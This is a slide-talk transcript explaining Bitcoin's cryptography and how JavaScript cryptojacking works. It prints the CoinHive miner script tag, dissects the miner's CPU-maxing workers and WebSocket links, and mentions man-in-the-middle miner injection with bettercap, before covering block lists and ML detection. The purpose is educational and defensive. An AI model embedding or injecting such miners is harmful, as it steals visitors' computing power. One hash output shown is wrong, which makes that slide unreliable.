Upgrade to Pro — share decks privately, control downloads, hide ads and more …

Just enough bitcoing to go cryptojacking with JavaScript

Just enough bitcoing to go cryptojacking with JavaScript

Whatever their price, Bitcoin and cryptocurrencies continue to provide interesting technical and security opportunities. This talk gives a comprehensive introduction of bitcoin & cryptocurrency technology, and then analyzes how cryptojacking attacks are executed with JavaScript.

Ec25d046746de3be33779256f6957d8f?s=128

luke crouch

April 12, 2019
Tweet

Transcript

  1. Just enough bitcoin to go cryptojacking with Javascript

  2. About me Privacy & Security Engineer Vice President

  3. None
  4. None
  5. Just enough bitcoin to go cryptojacking with Javascript

  6. 2 parts to this talk • Cryptocurrency • Crypto-jacking attacks

    with web APIs
  7. Bitcoin and Cryptocurrency Technologies A Comprehensive Introduction

  8. Khan Acadmy: Journey into cryptography: modern cryptography https://www.khanacademy.org/computing/computer-science/cryptography#modern-crypt

  9. This talk will actually cover cryptography

  10. ⚠ Spoiler Alert: There’s no “encryption” in cryptocurrencies

  11. 
 This talk will not cover the crypto math

  12. 
 (maybe just a little)

  13. The “crypto” in cryptocurrency • Cryptographic hash functions • Hash

    Pointers • Blockchain • Public Key Cryptography • Digital Signatures
  14. Public Key Cryptography Digital Signatures Hash Pointers Blockchain Cryptocurrency Bitcoin

    Cryptographic Hash Functions
  15. Public Key Cryptography Digital Signatures Hash Pointers Blockchain Cryptocurrency Bitcoin

    Cryptographic Hash Functions
  16. H(message) hash message We the People of the United States

    … until an election of Representatives shall have intervened. e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
  17. “hash” function • Maps data of arbitrary size into data

    of a fixed size • e.g., justTheFirstLetter(string) • justTheFirstLetter(“hash”) // returns h • justTheFirstLetter(“function”) // returns f • justTheFirstLetter(“returns”) // returns r • justTheFirstLetter(“fixed-size”) // returns f
  18. cryptographic hash function • resists “collisions” • hides original (plaintext)

    message
  19. “hash” function • e.g., justTheFirstLetter(string) • justTheFirstLetter(“hash”) // returns h

    • justTheFirstLetter(“function”) // returns f • justTheFirstLetter(“returns”) // returns r • justTheFirstLetter(“fixed-size”) // returns f
  20. H(message) hash collision! message “The bearer of this note may

    redeem it for one dollar by presenting it to me” 51a6b3 We the People of the United States … until an election of Representatives shall have intervened. resist collisions: 2 different messages shouldn’t produce the same hash
  21. hiding: “1-way” function

  22. 51a6b3 hiding: given the hash, not feasible to find the

    message ? ?
  23. H(message) easy-to-find hashes message tails 3e5368 heads hiding: what if

    there are only 2 possible messages? 22814c
  24. tails 3e5368 heads hiding: what if there are only 2

    possible messages? 22814c 3e5368 ? heads
  25. H(message || nonce) hash message tails dc66ec heads hiding: add

    random value: “nonce” or “salt” 0f2c72 nonce a a
  26. H() hash message tails dc66ec heads hiding: add random value:

    “nonce” 0f2c72 nonce tails 3e5368 heads 22814c a a
  27. tails dc66ec heads hiding: add random value: “nonce” 0f2c72 tails

    3e5368 heads 22814c a a tails 8d23aa heads 15db7d b b
  28. ? message hash dc66ec hiding: given the hash, not feasible

    to find the message or nonce ? ? nonce ?
  29. cryptographic hash function
 for cryptocurrency • resists “collisions” • hides

    original (plaintext) message • for cryptocurrency: “puzzle friendly”
  30. puzzle friendliness Given hash output and part of input (i.e.,

    the nonce), it’s “hard” (but not infeasible) to find the input
  31. hiding vs. puzzle-friendly https://stackoverflow.com/questions/42042840/properties-of-a-cryptographic-hash-function

  32. “hard”/“difficult”
 vs.
 “infeasible”

  33. message hash dc66ec puzzle-friendly: given the hash and nonce, hard

    to find a message lots of work nonce 123456 message lots of work
  34. openssl to hash messages echo “The bearer of this note

    may redeem it for one dollar by presenting it to me” | openssl sha256 51a6b38fd78e5e20246bd0103668056a2a8981274e9487ea3f18158e59b690e7 echo “We the People of the United States … until an election of Representatives shall have intervened.” | openssl sha256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
  35. sha256: Secure Hash Algorithm (with 256-bit digests)

  36. Note: sha256 is what bitcoin uses!

  37. Public Key Cryptography Digital Signatures Hash Pointers Blockchain Cryptocurrency Bitcoin

    Cryptographic Hash Functions
  38. H( ) = e3b0c4 We the People of the United

    States … until an election of Representatives shall have intervened. hash pointer: where full plaintext data is stored, AND a cryptographic hash of the data
  39. hash pointers enable everyone else to verify the truth of

    the data
  40. so, hashes might give us confidentiality - i.e., to keep

    something secret
  41. but these hash pointers give us integrity … … NOT

    confidentiality
  42. Remember: there’s not necessarily “encryption” (i.e., confidentiality)
 in cryptocurrency

  43. Public Key Cryptography Digital Signatures Hash Pointers Blockchain Cryptocurrency Bitcoin

    Cryptographic Hash Functions
  44. prev: H()
 e3b0c4 block chain: linked list of hash pointers

    prev: H()
 f4c1d5 data data prev: H()
 05d2e6 data
  45. Now we can have a tamper-proof ledger (of digital dollars)!

    prev: H()
 e3b0c4 prev: H()
 f4c1d5 “The bearer of this note may redeem it for one dollar by presenting it to me” prev: H()
 05d2e6 “The bearer of this note may redeem it for one dollar by presenting it to me” “The bearer of this note may redeem it for one dollar by presenting it to me”
  46. Public Key Cryptography Digital Signatures Hash Pointers Blockchain Cryptocurrency Bitcoin

    Cryptographic Hash Functions
  47. Public Key Cryptography It gives us public & private keys!

  48. Khan Acadmy: Journey into cryptography: modern cryptography https://www.khanacademy.org/computing/computer-science/cryptography#modern-crypt

  49. The quick version …

  50. … nevermind, the quick version was still too long.

  51. 1-way mathematical function: modular exponentiation

  52. Symmetric Encryption requires extra communication overhead in Diffie-Hellman Key Exchange

  53. Alice has to exchange extra messages to establish a unique

    key with everyone
  54. Alice has to manage tons of keys

  55. Instead, Alice needs a
 public “lock” she can copy and

    share with anyone, and a single private “key” …
  56. … to do this, you need a “trap door 1-way

    function”
  57. … a “trap door 1-way function” is a 1-way function

    that is infeasible to reverse …
  58. … a “trap door 1-way function” is a 1-way function

    that is infeasible to reverse … unless you have a secret piece of information
  59. mathematical trapdoor 1-way function: modular exponentiation and phi

  60. math math math • Phi function of large numbers is

    infeasible to calculate, *except* for prime numbers • Multiplying large prime numbers is infeasible to reverse • The “Prime Factorization” problem • Euler’s Theorem shows that mphi(n) ≅1 mod n.
  61. math and keys!

  62. Most important to us: math says the public key can

    be public 
 while the secret key stays secret
  63. Public Key Cryptography Digital Signatures Hash Pointers Blockchain Cryptocurrency Bitcoin

    Cryptographic Hash Functions
  64. digital signatures: required properties • Only you can sign your

    signature, but anyone can verify that it’s valid
 
 
 • The signature is attached to a single document - it can’t be used to indicate you agree to a different document
  65. signature = sign(secret key, message) “The bearer of this note

    may redeem it for one dollar by presenting it to me” -with love, from Luke
  66. valid = verify(public key, message, signature) “The bearer of this

    note may redeem it for one dollar by presenting it to me” -with love, from Luke
  67. where do secret & public keys come from?

  68. from decades of “math math math” written into libraries

  69. openssl to create secret & public keys openssl ecparam -genkey

    -name secp256k1 -rand /dev/urandom -out \ /Users/lcrouch/secret_key openssl ec -in /Users/lcrouch/ secret_key -pubout -out \ /Users/lcrouch/public_key
  70. openssl to sign & verify openssl dgst -sign secret_key message

    -out luke_dollar.signed openssl dgst -verify public_key 
 -signature luke_dollar.signed valid
  71. digital signatures enable everyone else to verify the authenticity of

    the data
  72. authenticity the person writing the data

  73. The “crypto” in cryptocurrency gives us … • Integrity, from

    • Blockchain, from • Hash pointers, from • Hash functions • Authenticity,
 Non-repudiation, from • Digital Signatures, from • Public Key Cryptography … not encryption for confidentiality
  74. Public Key Cryptography Digital Signatures Hash Pointers Blockchain Cryptocurrency Bitcoin

    Cryptographic Hash Functions
  75. Now we have enough cryptographic primitives to build a (really

    bad) cryptocurrency
  76. “Goofycoin” cryptocurrency

  77. Goofycoin 1. Designated entity - Goofy - can create new

    coins anytime and coins belong to Goofy 2. Whoever owns a coin can transfer it to someone else
  78. Goofy creates coins • Generates unique coin ID: 001 •

    Makes message: “CreateCoin 001” • Hashes and signs message as H(1) with secret key
  79. Goofy transfers coin to Alice • New message:
 “Starting at

    H(1), PayCoin 001 to Alice” • Note: Alice = Alice’s public key / address • Hashes and signs message as H(2) with secret key
  80. Alice transfers coin to Bob • New message:
 “Starting at

    H(2), PayCoin 001 to Bob” • Note: Bob = Bob’s public key / address • Hashes and signs message as H(3) with secret key
  81. Now we can have a tamper-proof ledger of transactions! CreateCoin

    001 Goofy PayCoin: 001 Alice Goofy H( ) Alice H( ) PayCoin: 001 Bob
  82. Goofycoin 1. Designated entity - Goofy - can create new

    coins anytime and coins belong to Goofy 2. Whoever owns a coin can transfer it to someone else 3. Anyone can verify coin ownership by following block-chain back to Goofy
  83. Security problem: Double-spend

  84. Alice can pay the same coin to Chuck CreateCoin [12345]

    Goofy PayCoin: [12345] Alice Goofy H( ) Alice H( ) PayCoin: [12345] Bob Alice H( ) PayCoin: [12345] Chuck
  85. How do we decide which ledger is the truth?

  86. “Scroogecoin” cryptocurrency

  87. Scroogecoin • Goofycoin + • Designated entity - Scrooge -

    publishes the canonical public ledger of all transactions • Everyone broadcasts coin transactions to Scrooge • Only accept coins in Scrooge’s public ledger
  88. Scroogecoin • Scrooge builds block chain to digitally sign •

    Each block has a transaction in it • ID • contents • hash point to previous block • Scrooge signs final hash pointer • Scrooge publishes signature and block chain
  89. Scroogecoin Transactions • CreateCoins • PayCoins

  90. CreateCoins number value recipient 1 3.2 Scrooge 2 1.4 Goofy

    3 7.1 Alice CreateCoins transID: 1
  91. PayCoins number value recipient 1 1 Bob 2 6.1 Alice

    PayCoins coins: 1(3) transID: 2 Which coins are being consumed?
  92. number value recipient 1 1 Bob 2 6.1 Alice PayCoins

    coins: 1(3) transID: 2 number value recipient 1 3.2 Scrooge 2 1.4 Goofy 3 7.1 Alice transID: 1 CreateCoins 1(3)
  93. Scrooge signs off on everything prev: H()
 e3b0c4 transID: 1

    prev: H()
 f4c1d5 transID: 2 H()
 05d2e6 Scrooge number value recipient 1 3.2 Scrooge 2 1.4 Goofy 3 7.1 Alice number value recipient 1 1 Bob 2 6.1 Alice PayCoins coins: 1(3) CreateCoins
  94. Now, when Alice tries to double-spend …

  95. Alice tries to re-spend coin from Block 1 after Scrooge

    signs Block 2 prev: H()
 e3b0c4 transID: 1 prev: H()
 f4c1d5 transID: 2 H()
 05d2e6 Scrooge number value recipient 1 3.2 Scrooge 2 1.4 Goofy 3 7.1 Alice number value recipient 1 1 Bob 2 6.1 Alice PayCoins coins: 1(3) CreateCoins prev: H()
 f4c1d5 transID: 2 number value recipient 1 1 Chuck 2 6.1 Alice PayCoins coins: 1(3)
  96. Scrooge catches her

  97. Scrooge rejects Alice’s double-spend transaction prev: H()
 e3b0c4 transID: 1

    prev: H()
 f4c1d5 transID: 2 H()
 05d2e6 Scrooge number value recipient 1 3.2 Scrooge 2 1.4 Goofy 3 7.1 Alice number value recipient 1 1 Bob 2 6.1 Alice PayCoins coins: 1(3) CreateCoins prev: H()
 f4c1d5 transID: 2 number value recipient 1 1 Chuck 2 6.1 Alice PayCoins coins: 1(3)
  98. So, we’ve got a cryptocurrency …

  99. Public Key Cryptography Digital Signatures Hash Pointers Blockchain Cryptocurrency Bitcoin

    Cryptographic Hash Functions
  100. but Scrooge … • maintains the ledger of transactions •

    has authority over which transactions are valid • creates new coins
  101. How do we get rid of Scrooge?

  102. Without Scrooge … • Who maintains the ledger of transactions?

    • Who has authority over which transactions are valid? • Who creates new coins?
  103. Coin miners!

  104. Coin miners • maintain the ledger of transactions • have

    authority over which transactions are valid • create new coins
  105. Who are coin miners?

  106. Let’s look at Bitcoin specifically

  107. Bitcoin is a peer-to-peer network

  108. You can participate!

  109. None
  110. It will take up all your disk space

  111. To pay Bob, Alice broadcasts a transaction to all Bitcoin

    nodes
  112. Alice Bitcoin Node Bitcoin Node Bitcoin Node Bitcoin Node Bitcoin

    Node
  113. Bitcoin nodes (maybe) include Alice’s transaction in the next block

  114. A block is just a large grouping of transactions

  115. Bitcoin nodes are governed by a Distributed Consensus Protocol

  116. Skipping: Distributed Consensus Protocol tl;dr: it needs a majority of

    nodes to behave honestly, and to pick a random node from the network for each block
  117. How do you make a majority of nodes behave honestly?

  118. NOT crypto … incentives!

  119. “… Bitcoin works better in practice than in theory.”

  120. “… Bitcoin works better in practice than in theory.” •

    Consensus over time • Incentives
  121. Can we give nodes an incentive to behave honestly over

    the long term?
  122. No real identities, so we can’t exactly mail them cash

  123. If only there were a digital currency we could give

    them without having to know their real identities …
  124. Block reward: CreateCoins transaction

  125. Alice mines a block, and gets to create new coins

    to herself number value recipient CreateCoins 0 25 Alice (dc3c6e) PayCoins from 1(1) 1 1.1 Bob (e5ceb5) 2 6.1 Alice (dc3c6e) transID: 2
  126. Financial incentive to be honest: miners only include valid transactions,

    because they want their own CreateCoins transaction included in the long-term consensus block-chain
  127. A distributed consensus protocol 1. New transactions are broadcast to

    all nodes 2. Each node collects new transactions into a block 3. In each round, a random node adds its block to the end of the block-chain 4. Other nodes accept the block only if all transactions in it are valid - i.e., unspent coins with valid signatures
  128. In each round, how do you pick a random node?

  129. Proof of Work

  130. Proof of work • Approximate random selection in proportion to

    a scarce resource • In Bitcoin, it’s computing power • Nodes compete with each other on computing power
  131. Hash puzzles

  132. puzzle friendliness Given hash output and part of input (i.e.,

    the nonce), it’s “hard” (but not infeasible) to find the input
  133. message hash dc66ec puzzle-friendly: given the hash and nonce, hard

    to find a message lots of work nonce 123456 message lots of work
  134. Hash puzzles in bitcoin mining • To create a block,

    a node is required to find a nonce such that when you combine … • nonce • previous block’s hash • list of transactions • … the hash output should be a string that falls into a certain range
  135. H(nonce || prev_hash || tx || tx || … ||

    tx) < target
  136. In Bitcoin the target is a string that starts with

    some number of 0’s
  137. sha256 is “puzzle-friendly”, so the only way to solve this

    puzzle is to just try random nonces
  138. In Bitcoin the target is a string that starts with

    some number of 0’s
  139. blockchain.com

  140. None
  141. Yay! We made it to Bitcoin!

  142. Public Key Cryptography Digital Signatures Hash Pointers Blockchain Cryptocurrency Bitcoin

    Cryptographic Hash Functions
  143. So, to mine cryptocurrency you need: • Lots of efficient

    processing to complete the proof-of-work hashing • Lots of efficient networking to communicate with the distributed peer-to-peer nodes
  144. Efficient processing Are CPUs good enough?

  145. https://www.slideshare.net/AmazonWebServices/aws-reinvent-2016-deep-learning-3d-content-rendering-and-massively-parallel-compute-intensive-workloads-in-the-cloud-cmp317

  146. CPU mining Bitcoin ~20M h/s = several hundred thousand years

    to get a block https://99bitcoins.com/20-insane-bitcoin-mining-rigs/
  147. GPU mining Bitcoin ~200M h/s = hundreds of years http://blog.whitesites.com/GPU-miners-vs-USB-ASIC-Miners-for-Bitcoin__635096680766259765_blog.htm

  148. ASIC mining Bitcoin 2,100,000M h/s and 0.43 watts/Gigahashes http://blog.whitesites.com/GPU-miners-vs-USB-ASIC-Miners-for-Bitcoin__635096680766259765_blog.htm

  149. ASIC mining Bitcoin 2,100,000M h/s and 0.43 watts/Gigahashes https://99bitcoins.com/7-awesome-asic-bitcoin-miners/

  150. ASIC mining Bitcoin 2,100,000M h/s and 0.43 watts/Gigahashes https://seekingalpha.com/article/4140062-bitcoin-transaction-fee-issue-going-get-worse

  151. So how could a victim’s computer ever mine cryptocurrency?

  152. You would need to “infect” 105K CPUs or 10.5K GPUs

    to compete with a single ASIC
  153. ASIC-resistant puzzle hashing algorithms Since ASICs include very little memory,

    use a memory-intensive hashing algorithm
  154. scrypt http://www.pointsoftware.ch/en/the-importance-of-hashing-passwords-part-4-the-hardware-threat/

  155. scrypt & Litecoin • scrypt hashing function • Fill a

    large buffer of RAM • Mutate the memory in pseudo-random order • O(N2) function • Choose N large enough to make memory faster • Litecoin • ASICs already out for Litecoin param of N=128KB • 504M h/s at 1.58 w/MH • (Remember Bitcoin was 2,100,000M h/s and 0.43 watts/Gigahashes) https://www.hashespersecond.com/asic/
  156. CryptoNight https://4.bp.blogspot.com/-NJddW0tx9j0/U_6C2wgXSAI/AAAAAAAAkDk/nyKkOESWgwI/s1600/cryptonight.png

  157. Memory-hard hashes • CryptoNight hashing function • Monero • 2MB

    memory buffer • Uses AES-NI found on most modern x86_64 CPUs • ASICs: 0.2M h/s @ 2.27 w/KH • Litecoin ASIC: 504M h/s @ 1.58 w/MH • Bitcoin ASIC: 2,100,000M h/s and 0.043 w/MH • Also, Monero adjusted PoW algo. so these devices don’t work for Monero anymore https://www.hashespersecond.com/asic/
  158. So, a victim’s computer could feasibly mine Monero

  159. Oh yeah, Javascript

  160. With Web APIs you get: • Efficient processing to complete

    the proof-of-work hashing • Web Workers & WebAssembly • Efficient networking to communicate with the distributed peer-to-peer nodes • Web Sockets
  161. Cryptojacking! <script src=“https://coinhive.com/lib/coinhive.min.js"></script>

  162. coinhive.min.js

  163. CoinHive Malware Analysis • Creates WebWorker with number of threads

    == number of CPU cores available (up to 8 max) • Loads WebAssembly program into worker for mining (default throttle to 100% CPU usage!) • Creates WebSocket connection between server and browser • Server notifies browser if new blocks are found and sends new transactions to browser
  164. • threads - number of WebWorkers to use; defaults to

    using as many cores as possible • throttle - fraction of time threads should be idle; defaults to “0” https://webcache.googleusercontent.com/search?q=cache:https://coinhive.com/documentation/miner
  165. Check if already loaded; if not, download; _startNow() when ready

  166. Don’t run in multiple tabs (how nice of them!)

  167. we’re not maxing out the cores?! spawn more worker jobs!

    Note: this._threads for later
  168. Finally! new Worker()

  169. https://www.slideshare.net/enriqueoriol7/boost-your-angular-app-with-web-workers

  170. https://www.slideshare.net/enriqueoriol7/boost-your-angular-app-with-web-workers

  171. https://www.slideshare.net/enriqueoriol7/boost-your-angular-app-with-web-workers

  172. https://www.slideshare.net/enriqueoriol7/boost-your-angular-app-with-web-workers

  173. Finally! new Worker()

  174. lots of js, including WebAssembly, as an object URL Note:

    WEBSOCKET_SHARDS for later …
  175. None
  176. None
  177. back in startNow, _connect to servers for block updates

  178. new WebSocket to a random server from WEBSOCKET_SHARDS Note: remember

    WEBSOCKET_SHARDS from before?
  179. new WebSocket()

  180. Traditional HTTP “polling” adds repeated request + response overhead https://www.pubnub.com/blog/2014-10-01-websockets-and-long-polling-in-javascript-ruby-and-python/

  181. WebSocket allows bidirectional messaging

  182. 1K messages over time WebSocket vs. REST (HTTP) http://blog.arungupta.me/rest-vs-websocket-comparison-benchmarks/

  183. new WebSocket to a random server from WEBSOCKET_SHARDS

  184. Note: remember this._threads from before?

  185. None
  186. How to get this into browsers?

  187. Ask websites to include it

  188. Mozilla research • Crawl Alexa Top 10k looking for <script>

    tags to one of the 212 crypto-jacking hosts in adblock-nocoin-list • Of 6M <script> calls, 945 (0.015%) use crypto-jacking script • number of crypto-jacking hosts used: 11 (5.2% of known hosts) • number of CoinHive scripts: 507 (54%) • Majority of domains detected with crypto-jacking were streaming sites https://github.com/mozilla/UCOSP-winter-2018_TrackingTechnologies/blob/master/analyses/cryptojacking/cryptojacking_analysis.ipynb
  189. Note: coinhive.com is now gone; only authedmine.com remains

  190. malvertising

  191. Malvertising research

  192. Man-in-the-middle injection bettercap.org

  193. mitm crypto-miner.js caplet from bettercap

  194. What to do about it?

  195. First: Add known
 crypto-miners to our block-list

  196. None
  197. Done • Go to about:config • Search for urlclassifier.trackingTable •

    add tracking-protection-base-cryptomining and tracking-protection-content-cryptomining
  198. As of Tuesday, it’s even easier!

  199. None
  200. None
  201. Use Machine-Learning and other heuristics to detect crypto-mining JS

  202. “Towards Seamless Tracking-Free Web: Improved Detection of Trackers via One-

    class learning” • Summary:
 Training a classifier to detect JS tracking code • Conducted by:
 • Data Source:
 Web crawl of Alexa top 50
 45 random sites from Alexa 5,000-45,000 • Machine Learning Algorithms/Methods:
 Support Vector Machine, Positive & Unlabeled • Data features:
 JavaScript semantic & syntactic tokens and n-grams • Results • 99% true positives for one-class Support Vector Machine https://www.degruyter.com/downloadpdf/j/popets.2017.2017.issue-1/popets-2017-0006/popets-2017-0006.pdf
  203. Questions? • Crypto -> Blockchain • Bitcoin • Web Workers,

    Web Assembly • Web Sockets • Preventing • Luke Crouch • @groovecoder • speakerdeck.com/groovecoder • github.com/groovecoder